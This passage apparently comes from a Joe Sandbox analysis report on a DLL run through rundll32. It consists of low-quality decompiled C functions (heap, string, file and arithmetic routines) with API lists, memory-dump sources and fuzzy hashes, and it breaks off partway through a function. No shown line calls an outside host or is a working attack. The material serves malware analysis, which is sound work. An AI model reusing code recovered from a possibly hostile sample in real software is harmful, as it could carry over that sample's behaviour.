                  C-Code - Quality: 30%
                  			E00000001180004DD0(long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long* __r8) {
                  				void* _t13;
                  				intOrPtr* _t39;
                  				intOrPtr _t41;
                  				CHAR* _t54;
                  				long long _t60;
                  				long long _t61;
                  				void* _t63;
                  				long _t69;
                  				long _t73;
                  				long long _t74;
                  				void* _t76;
                  				CHAR* _t79;
                  
                  				 *((long long*)(_t63 + 8)) = __rbx;
                  				 *((long long*)(_t63 + 0x10)) = _t60;
                  				 *((long long*)(_t63 + 0x18)) = __rsi;
                  				_t39 =  *0x8000d4a0;
                  				_t41 =  *((intOrPtr*)(_t39 + 8));
                  				_t13 = lstrlenA(_t79) + 1;
                  				r8d = _t13;
                  				HeapAlloc(_t76, _t73, _t69);
                  				_t74 = _t39;
                  				if (_t39 == __rsi) goto 0x80004eb7;
                  				HeapAlloc(??, ??, ??);
                  				_t61 = _t39;
                  				if (_t39 == __rsi) goto 0x80004ea9;
                  				E00000001180004994(_t39, _t41, __rcx);
                  				if (_t39 == __rsi) goto 0x80004e62;
                  				if ( *_t39 !=  *((intOrPtr*)(_t39 + 1))) goto 0x80004e62;
                  				_t6 = _t39 + 2; // 0x2
                  				E00000001180004994(_t39, _t41, _t6);
                  				if (_t39 == __rsi) goto 0x80004e8e;
                  				r8d = _t13 - r12d;
                  				memcpy(??, ??, ??);
                  				 *((intOrPtr*)(_t41 + _t74)) = sil;
                  				lstrcpyA(_t54);
                  				goto 0x80004e9c;
                  				lstrcpyA(??, ??);
                  				 *_t61 = 0x2f;
                  				 *((intOrPtr*)(_t61 + 1)) = sil;
                  				 *__rdx = _t74;
                  				 *__r8 = _t61;
                  				goto 0x80004eb7;
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}















                  0x180004dd0
                  0x180004dd5
                  0x180004dda
                  0x180004dec
                  0x180004df9
                  0x180004e0d
                  0x180004e0f
                  0x180004e14
                  0x180004e1a
                  0x180004e20
                  0x180004e2e
                  0x180004e34
                  0x180004e3a
                  0x180004e3f
                  0x180004e4a
                  0x180004e51
                  0x180004e53
                  0x180004e5a
                  0x180004e6b
                  0x180004e72
                  0x180004e77
                  0x180004e82
                  0x180004e86
                  0x180004e8c
                  0x180004e8e
                  0x180004e94
                  0x180004e98
                  0x180004e9c
                  0x180004ea4
                  0x180004ea7
                  0x180004eb1
                  0x180004ed5

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Alloclstrcpy$Freelstrlenmemcpystrchr
                  • String ID:
                  • API String ID: 2951650171-0
                  • Opcode ID: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
                  • Instruction ID: 05cbd2bd38c1d1587f62c6617ae6625bb3c46c91ac70328d53f87b1fbcc7e3b3
                  • Opcode Fuzzy Hash: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
                  • Instruction Fuzzy Hash: 9C21BF723047D886E782EF66B80839ABA91B38CFD4F49C420FE498B755DE38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 29%
                  			E000000011800099F4(void* __ecx, long long __rbx, void* __rcx, long long __rdx, void* __rsi, void* __rbp, intOrPtr* __r8, void* __r10, void* __r11, char _a8, long long _a16, long long _a24) {
                  				void* _v48;
                  				char _v56;
                  				char _v64;
                  				char _v72;
                  				intOrPtr _v80;
                  				long long _v88;
                  				void* __rdi;
                  				void* _t73;
                  				long long _t75;
                  				void* _t91;
                  				intOrPtr _t106;
                  				intOrPtr* _t115;
                  
                  				_t92 = __rsi;
                  				_a24 = __rbx;
                  				_a16 = __rdx;
                  				_t106 =  *((intOrPtr*)(__rcx + 0x40));
                  				_t75 = __rdx;
                  				r10d =  *(_t106 + 2) & 0x0000ffff;
                  				_t115 = __r8;
                  				if ( *0x8000d4a0 - __r10 + 8 <= 0) goto 0x80009a51;
                  				_t73 = __r10 + _t106 + 8;
                  				if (( *0x8000d498 ^ 0xecb028fc) == 0) goto 0x80009a53;
                  				E00000001180004ED8( *0x8000d498 ^ 0xecb028fc, _t73);
                  				goto 0x80009a53;
                  				if (_t73 == 0) goto 0x80009b5c;
                  				_t9 =  &_a8; // 0x52
                  				_t10 =  &_v56; // 0x12
                  				if (E000000011800094E0(__rdx, _t73, _t91, __rsi, __rbp, _t10, _t9) != 0) goto 0x80009b61;
                  				_t11 = _t73 + 2; // 0x2
                  				if (_a8 - _t11 <= 0) goto 0x80009aa8;
                  				_t15 =  &_v64; // 0xa
                  				_t16 =  &_v48; // 0x1a
                  				E000000011800081F0(_a8, _t75, _v56, _t92, _t16, _t15, __r11);
                  				goto 0x80009aad;
                  				if (0x57 != 0) goto 0x80009b36;
                  				r13d = _v64;
                  				_t19 =  &_v72; // 0x2
                  				_t20 =  &_v64; // 0xa
                  				_v80 = r13d;
                  				_v72 =  *_t115;
                  				_v88 = _v48;
                  				if (E00000001180006EB0( *_t115, _t75, _t75, _t20, _t19) != 0) goto 0x80009b16;
                  				memcpy(??, ??, ??);
                  				 *_t115 = _v72;
                  				HeapFree(??, ??, ??);
                  				goto 0x80009b1b;
                  				memset(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				r8d = _a8;
                  				memset(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009b61;
                  				return 2;
                  			}















                  0x1800099f4
                  0x1800099f4
                  0x1800099f9
                  0x180009a0b
                  0x180009a16
                  0x180009a19
                  0x180009a36
                  0x180009a3c
                  0x180009a3e
                  0x180009a45
                  0x180009a4a
                  0x180009a4f
                  0x180009a56
                  0x180009a5c
                  0x180009a64
                  0x180009a77
                  0x180009a7d
                  0x180009a87
                  0x180009a95
                  0x180009a9a
                  0x180009a9f
                  0x180009aa6
                  0x180009aaf
                  0x180009ab5
                  0x180009ac2
                  0x180009ac7
                  0x180009acf
                  0x180009ad4
                  0x180009ad8
                  0x180009ae6
                  0x180009afc
                  0x180009b0b
                  0x180009b0e
                  0x180009b14
                  0x180009b23
                  0x180009b30
                  0x180009b36
                  0x180009b45
                  0x180009b54
                  0x180009b5a
                  0x180009b78

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: FreeHeap$memset$memcpy
                  • String ID:
                  • API String ID: 4172471534-0
                  • Opcode ID: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
                  • Instruction ID: 54b9a56baf89d223affce05d04c9eed0c8a26e8b2822132c81dbcb815bbc5161
                  • Opcode Fuzzy Hash: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
                  • Instruction Fuzzy Hash: A9418E32204A8982EA92DB56E4007DBB7A1F7CDBD4F55C012FE8947759EF38C64ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00000001180008034(void* __ebx, signed int __edx, void* __ebp, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long __r8, intOrPtr* __r9, void* _a8, void* _a16, long long* _a24, void* _a32) {
                  				void* _t44;
                  				void* _t52;
                  				long long _t53;
                  				signed long long _t54;
                  				intOrPtr _t67;
                  				long _t68;
                  				long long _t70;
                  				void* _t77;
                  				intOrPtr* _t83;
                  				long _t87;
                  				void* _t88;
                  				void* _t90;
                  				struct _CRITICAL_SECTION* _t92;
                  				struct _CRITICAL_SECTION* _t96;
                  
                  				_t52 = _t77;
                  				 *((long long*)(_t52 + 8)) = __rbx;
                  				 *((long long*)(_t52 + 0x10)) = __rbp;
                  				 *((long long*)(_t52 + 0x20)) = __rsi;
                  				 *((long long*)(_t52 + 0x18)) = __r8;
                  				_t53 =  *0x8000d4a0;
                  				_t88 = __rcx;
                  				EnterCriticalSection(_t96);
                  				LeaveCriticalSection(_t92);
                  				HeapAlloc(_t90, _t87, _t68);
                  				_t70 = _t53;
                  				if (_t53 == __edx) goto 0x80008129;
                  				memset(??, ??, ??);
                  				EnterCriticalSection(??);
                  				r11d =  *((intOrPtr*)(__rcx + 0xa8));
                  				_t44 =  >=  ? r11d :  *((intOrPtr*)(__rcx + 0xa8));
                  				if (_t44 == 0) goto 0x80008111;
                  				_t54 = __edx + __edx * 4;
                  				_t14 = _t88 + 0x98; // 0x98
                  				_t16 = _t54 * 8; // 0xc
                  				_t83 = _t70 + _t16 + 0xc;
                  				_t67 =  *_t14;
                  				 *((intOrPtr*)(_t83 - 0xc)) =  *((intOrPtr*)(_t67 + 0x1c));
                  				 *((long long*)(_t83 + 0x14)) =  *((intOrPtr*)(_t67 + 0x10));
                  				 *_t83 =  *((intOrPtr*)(_t67 + 0x18));
                  				 *((intOrPtr*)(_t83 + 0x28 - 0x1c)) =  *((intOrPtr*)(_t67 + 0x18));
                  				if (_t44 + 0xffffffff != 0) goto 0x800080e7;
                  				LeaveCriticalSection(??);
                  				 *__r9 = __ebp + 1;
                  				 *_a24 = _t70;
                  				goto 0x8000812e;
                  				return 8;
                  			}

















                  0x180008034
                  0x180008037
                  0x18000803b
                  0x18000803f
                  0x180008043
                  0x180008054
                  0x18000805e
                  0x18000806f
                  0x180008082
                  0x18000809a
                  0x1800080a2
                  0x1800080a8
                  0x1800080b2
                  0x1800080bc
                  0x1800080c2
                  0x1800080cd
                  0x1800080d3
                  0x1800080d5
                  0x1800080da
                  0x1800080e2
                  0x1800080e2
                  0x1800080e7
                  0x1800080ef
                  0x1800080f7
                  0x1800080fe
                  0x18000810b
                  0x18000810f
                  0x180008116
                  0x180008121
                  0x180008124
                  0x180008127
                  0x18000814c

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave$AllocHeapmemset
                  • String ID:
                  • API String ID: 3215818008-0
                  • Opcode ID: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
                  • Instruction ID: 1a3dd1e818266afc597f0a591a41220640f3dae03b5c6049ded73bf0a5c13329
                  • Opcode Fuzzy Hash: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
                  • Instruction Fuzzy Hash: F731A9B2A00B4896DB81CF5AE84878D77A0F748BD4F858026EF4D93360DF34CA9AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • lstrlenA.KERNEL32(?,?,?,?,00000001,00000001800058DA,?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000269E
                  • HeapAlloc.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026B0
                  • lstrcpyA.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026DB
                  • CloseHandle.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002724
                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000272C
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002741
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocCloseErrorFreeHandleLastlstrcpylstrlen
                  • String ID:
                  • API String ID: 2779700050-0
                  • Opcode ID: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
                  • Instruction ID: 8ed8152a395896e124fdee7dd42a1db6533dceb9cab86c829ebc78b2e775e80d
                  • Opcode Fuzzy Hash: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
                  • Instruction Fuzzy Hash: 8221AD36604788C6E7A6DF52B84039AB7A0B78CBE0F48C425FE9A47764CF38D649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 39%
                  			E00000001180003698(void* __eflags, long long __rbx, void* __rcx, long long __rdx, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, short _a32) {
                  				void* _v32;
                  				short _v38;
                  				short _v40;
                  				long long _v48;
                  				signed short _v54;
                  				signed short _v56;
                  				void* __rsi;
                  				void* _t20;
                  				void* _t24;
                  				short _t30;
                  				signed short _t32;
                  				long long _t44;
                  				long _t56;
                  				long _t59;
                  				void* _t60;
                  				long long _t63;
                  				void* _t65;
                  				void* _t75;
                  				void* _t76;
                  
                  				_t45 = __rbx;
                  				_t75 = _t65;
                  				 *((long long*)(_t75 + 8)) = __rbx;
                  				 *((long long*)(_t75 + 0x10)) = __rbp;
                  				_t44 =  *0x8000d4a0;
                  				_t60 = __r8;
                  				_t63 = __rdx;
                  				_t20 = E00000001180001000(__rbx, _t75 - 0x20, __rdx, _t75 + 0x20);
                  				r12d = 0;
                  				if (_t20 != r12d) goto 0x8000376a;
                  				_t30 = _a32;
                  				_v38 = _t30;
                  				_v40 = _t30;
                  				_t32 = _t30 + 1 + _t30 + 1;
                  				_v54 = _t32;
                  				r8d = _t32 & 0x0000ffff;
                  				HeapAlloc(_t76, _t56, _t59);
                  				_v48 = _t44;
                  				if (_t44 == _t76) goto 0x8000375a;
                  				r8d = 0;
                  				_v56 = r12w;
                  				if (RtlOemStringToUnicodeString(??, ??, ??) - r12d >= 0) goto 0x80003731;
                  				RtlNtStatusToDosError(??);
                  				goto 0x80003748;
                  				_t24 = E00000001180005A0C((_v56 & 0x0000ffff) >> 1, _t45, _v48, _t60, _t63, _t63, _t60);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				return _t24;
                  			}






















                  0x180003698
                  0x180003698
                  0x18000369b
                  0x18000369f
                  0x1800036ab
                  0x1800036b2
                  0x1800036b5
                  0x1800036c4
                  0x1800036c9
                  0x1800036d1
                  0x1800036d7
                  0x1800036dd
                  0x1800036e2
                  0x1800036ea
                  0x1800036ed
                  0x1800036f2
                  0x1800036f9
                  0x1800036ff
                  0x180003707
                  0x180003713
                  0x180003716
                  0x180003725
                  0x180003729
                  0x18000372f
                  0x180003743
                  0x180003754
                  0x180003764
                  0x18000377e

                  APIs
                    • Part of subcall function 0000000180001000: CreateFileW.KERNEL32 ref: 000000018000104A
                    • Part of subcall function 0000000180001000: GetFileSize.KERNEL32 ref: 000000018000105E
                    • Part of subcall function 0000000180001000: CloseHandle.KERNEL32 ref: 00000001800010D9
                    • Part of subcall function 0000000180001000: HeapFree.KERNEL32 ref: 00000001800010F0
                  • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 00000001800036F9
                  • RtlOemStringToUnicodeString.NTDLL ref: 000000018000371C
                  • RtlNtStatusToDosError.NTDLL ref: 0000000180003729
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003754
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003764
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$FileString$AllocCloseCreateErrorHandleSizeStatusUnicode
                  • String ID:
                  • API String ID: 45859668-0
                  • Opcode ID: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
                  • Instruction ID: f5e01ebc0847fc45ed597bc040b189ed2f2401146e9d5498dfbecc36209ca11f
                  • Opcode Fuzzy Hash: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
                  • Instruction Fuzzy Hash: 6D217172218B5881E6A1DB26E44579E73A1FB8CBD4F549521FA8E83768DF38C649CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E000000011800033B4(void* __eflags, long long __rbx, long long __rcx, long long __rdx, void* __r8, signed int __r9) {
                  				void* __rdi;
                  				intOrPtr _t65;
                  				intOrPtr _t87;
                  				intOrPtr _t100;
                  				intOrPtr _t101;
                  				intOrPtr _t105;
                  				signed long long _t107;
                  				void* _t112;
                  				void* _t120;
                  				signed long long _t123;
                  				signed long long _t130;
                  				intOrPtr* _t131;
                  				intOrPtr _t139;
                  				void* _t154;
                  				intOrPtr _t155;
                  				void* _t157;
                  				signed long long _t159;
                  				intOrPtr* _t160;
                  				void* _t163;
                  				void* _t165;
                  				void* _t166;
                  				intOrPtr* _t171;
                  				void* _t179;
                  				signed long long _t181;
                  				signed long long _t182;
                  				int _t185;
                  				int _t187;
                  				void* _t191;
                  
                  				 *((long long*)(_t165 + 0x18)) = __rbx;
                  				 *((long long*)(_t165 + 0x10)) = __rdx;
                  				 *((long long*)(_t165 + 8)) = __rcx;
                  				_t166 = _t165 - 0x660;
                  				_t155 =  *((intOrPtr*)(_t166 + 0x6c0));
                  				r13d = r9d;
                  				r9d =  *((intOrPtr*)(_t166 + 0x6c8));
                  				r9d = r9d - 1;
                  				_t123 = r9d - 1;
                  				if (__eflags < 0) goto 0x80003400;
                  				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x800033f1;
                  				_t105 = __r9 + 1;
                  				 *((intOrPtr*)(_t166 + 0x28)) = _t105;
                  				if (_t105 == 0) goto 0x80003641;
                  				_t13 = _t123 + 0x20; // 0x20
                  				r14d = _t13;
                  				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x8000342d;
                  				_t112 = 0 - r14d;
                  				if (_t112 >= 0) goto 0x8000342d;
                  				if (_t112 != 0) goto 0x80003422;
                  				r14d = r14d - 1;
                  				r8d = _t105;
                  				 *((intOrPtr*)(_t166 + 0x20)) = r14d;
                  				memset(_t191, _t187, _t185);
                  				_t16 = _t166 + 0x250; // 0x249
                  				r9d = r13d;
                  				r8d = r14d;
                  				_t130 = _t185 << 2;
                  				_t65 = E00000001180008AD0(_t112, _t130, _t16, __r8, _t155, _t179);
                  				_t17 = _t166 + 0x40; // 0x39
                  				r9d = _t105;
                  				 *((intOrPtr*)(_t166 + _t130 + 0x250)) = _t65;
                  				E00000001180008AD0(_t112, _t130, _t17, _t155, _t155, _t154);
                  				_t100 =  *((intOrPtr*)(_t166 + 0x40 + _t159 * 4));
                  				 *((intOrPtr*)(_t166 + 0x24)) = _t100;
                  				memset(_t163, ??);
                  				r13d = r13d - _t105;
                  				_t139 = _t105;
                  				_t181 = r13d;
                  				 *(_t166 + 0x30) = _t181;
                  				if (_t112 < 0) goto 0x800035ee;
                  				_t124 = _t181 + _t139;
                  				_t28 = _t181 * 4; // 0x249
                  				_t160 = _t166 + _t28 + 0x250;
                  				r9d = 0xffffffff;
                  				_t31 = _t124 * 4; // 0x249
                  				_t131 = _t166 + _t31 + 0x250;
                  				if (_t100 != r9d) goto 0x800034d0;
                  				_t101 =  *_t131;
                  				goto 0x800034fb;
                  				r8d = _t155 + 1;
                  				_t157 =  >  ? __r9 : (_t181 + _t139 << 0x20) + _t139 + _t181;
                  				_t44 = _t166 + 0x40; // 0x39
                  				_t171 = _t160;
                  				r10d = _t105;
                  				if (_t101 == 0) goto 0x8000357a;
                  				r12d = 0xffffffff;
                  				r9d =  *_t44;
                  				_t87 =  *_t160;
                  				r10d = r10d + r12d;
                  				_t176 = __r9 * _t163;
                  				 *_t171 = _t87;
                  				if (_t87 - r12d <= 0) goto 0x80003548;
                  				goto 0x8000354a;
                  				 *_t171 =  *_t171 - r9d;
                  				if ( *_t171 - r12d - r9d <= 0) goto 0x80003565;
                  				goto 0x80003567;
                  				if (r10d != 0) goto 0x80003517;
                  				_t107 =  *((intOrPtr*)(_t166 + 0x28));
                  				_t182 =  *(_t166 + 0x30);
                  				 *_t131 =  *_t131 - 0 + 0 + r11d;
                  				if ( *_t131 != 0) goto 0x80003595;
                  				_t47 = _t166 + 0x40; // 0x39
                  				r8d = _t107;
                  				_t120 = E000000011800049DC(_t160, _t47, _t171 + 4);
                  				if (_t120 < 0) goto 0x800035ae;
                  				_t48 = _t166 + 0x40; // 0x39
                  				r9d = _t107;
                  				 *_t131 =  *_t131 - E00000001180004D74(_t77,  *_t171, _t131, _t160, _t160, _t48);
                  				goto 0x8000357c;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x6a0)) + _t182 * 4)) = _t101 + 1;
                  				r13d = r13d - 1;
                  				 *(_t166 + 0x30) = _t182 - 1;
                  				r9d = 0xffffffff;
                  				if (_t120 >= 0) goto 0x800034c7;
                  				r14d =  *((intOrPtr*)(_t166 + 0x20));
                  				r8d =  *((intOrPtr*)(_t166 + 0x6c8));
                  				memset(??, ??, ??);
                  				_t57 = _t166 + 0x250; // 0x249
                  				r9d = _t107;
                  				r8d = r14d;
                  				E00000001180007220(_t120, _t131 - 4,  *((intOrPtr*)(_t166 + 0x6a8)), _t57, _t157, _t176, _t159);
                  				r8d = 0x40c;
                  				memset(??, ??, ??);
                  				r8d = 0x204;
                  				return memset(??, ??, ??);
                  			}































                  0x1800033b4
                  0x1800033b9
                  0x1800033be
                  0x1800033ce
                  0x1800033d5
                  0x1800033dd
                  0x1800033e0
                  0x1800033f1
                  0x1800033f4
                  0x1800033f8
                  0x1800033fe
                  0x180003400
                  0x180003404
                  0x18000340a
                  0x18000341a
                  0x18000341a
                  0x180003420
                  0x180003422
                  0x180003425
                  0x18000342b
                  0x18000342d
                  0x180003430
                  0x180003441
                  0x180003446
                  0x18000344b
                  0x180003456
                  0x180003459
                  0x18000345f
                  0x180003463
                  0x180003468
                  0x18000346d
                  0x180003473
                  0x18000347a
                  0x18000347f
                  0x180003490
                  0x180003494
                  0x180003499
                  0x18000349c
                  0x18000349f
                  0x1800034a2
                  0x1800034a7
                  0x1800034ad
                  0x1800034b1
                  0x1800034b1
                  0x1800034b9
                  0x1800034bf
                  0x1800034bf
                  0x1800034ca
                  0x1800034cc
                  0x1800034ce
                  0x1800034d3
                  0x1800034f7
                  0x1800034fd
                  0x180003505
                  0x180003508
                  0x18000350d
                  0x180003511
                  0x18000351a
                  0x180003520
                  0x180003524
                  0x180003527
                  0x18000353a
                  0x18000353f
                  0x180003546
                  0x18000354a
                  0x18000355c
                  0x180003563
                  0x18000356f
                  0x180003571
                  0x180003575
                  0x18000357a
                  0x18000357f
                  0x180003581
                  0x180003586
                  0x180003591
                  0x180003593
                  0x180003595
                  0x18000359a
                  0x1800035aa
                  0x1800035ac
                  0x1800035be
                  0x1800035c9
                  0x1800035cd
                  0x1800035d5
                  0x1800035db
                  0x1800035e1
                  0x1800035ee
                  0x1800035ff
                  0x180003604
                  0x18000360c
                  0x18000360f
                  0x180003615
                  0x180003624
                  0x18000362a
                  0x180003636
                  0x18000365b

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
                  • Instruction ID: ec3f035d16c0e924505bfe3f3cda61bac28d8e6f0fc5c54ff73492b97cc3beba
                  • Opcode Fuzzy Hash: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
                  • Instruction Fuzzy Hash: EE61F532704A8486E772CE27E8457DABB95F3D8BC8F448125EE4953B98DF39E605CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memcmp$FreeHeap
                  • String ID:
                  • API String ID: 1680564963-0
                  • Opcode ID: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
                  • Instruction ID: e13f11c4693d54ee7f56904197b6c81cc0d09359d032e1af4ae6464abc78b12e
                  • Opcode Fuzzy Hash: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
                  • Instruction Fuzzy Hash: 4551A172B0878955EBA2CB15A4843DA77A1A7AD7C4F54C025EE8C43786EE3DC64DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00000001180001EEC(void* __edi, void* __eflags, long long __rbx, long long __rcx, void* __rdx, void* __r8) {
                  				void* __rsi;
                  				signed int _t65;
                  				unsigned int _t66;
                  				signed int _t73;
                  				void* _t78;
                  				unsigned int _t85;
                  				void* _t87;
                  				void* _t91;
                  				void* _t112;
                  				int _t116;
                  				long long _t122;
                  				void* _t125;
                  				void* _t126;
                  				int _t143;
                  				void* _t145;
                  				void* _t148;
                  
                  				_t78 = __eflags;
                  				_t87 = _t125;
                  				 *((long long*)(_t87 + 0x10)) = __rbx;
                  				 *((long long*)(_t87 + 0x18)) = _t122;
                  				 *((long long*)(_t87 + 8)) = __rcx;
                  				_t126 = _t125 - 0x860;
                  				r14d =  *((intOrPtr*)(_t126 + 0x8b8));
                  				_t91 = __rdx;
                  				 *(_t126 + 0x30) = _t148 << 2;
                  				memcpy(_t148, _t145, _t143);
                  				_t9 = _t126 + 0x454; // 0x4a5
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(__rdx, _t9, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				_t13 = _t126 + 0x658; // 0x6a9
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t13, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				memset(_t112, _t116);
                  				 *((intOrPtr*)(_t126 + 0x40)) = 1;
                  				_t73 = __edi - 1;
                  				if (_t78 < 0) goto 0x80001faa;
                  				if ( *((intOrPtr*)(__r8 + (r9d - 1) * 4)) == 0) goto 0x80001f9a;
                  				r12d = _t73;
                  				if (_t73 < 0) goto 0x80002081;
                  				_t65 =  *(__r8 + _t73 * 4);
                  				if (_t73 != r12d) goto 0x80001fe8;
                  				if ((_t65 & 0xc0000000) != 0) goto 0x80001fe8;
                  				_t66 = _t65 << 2;
                  				if ((_t66 & 0xc0000000) == 0) goto 0x80001fd2;
                  				if (0x10000001e == 0) goto 0x80002075;
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				_t85 = _t66 >> 0x1e;
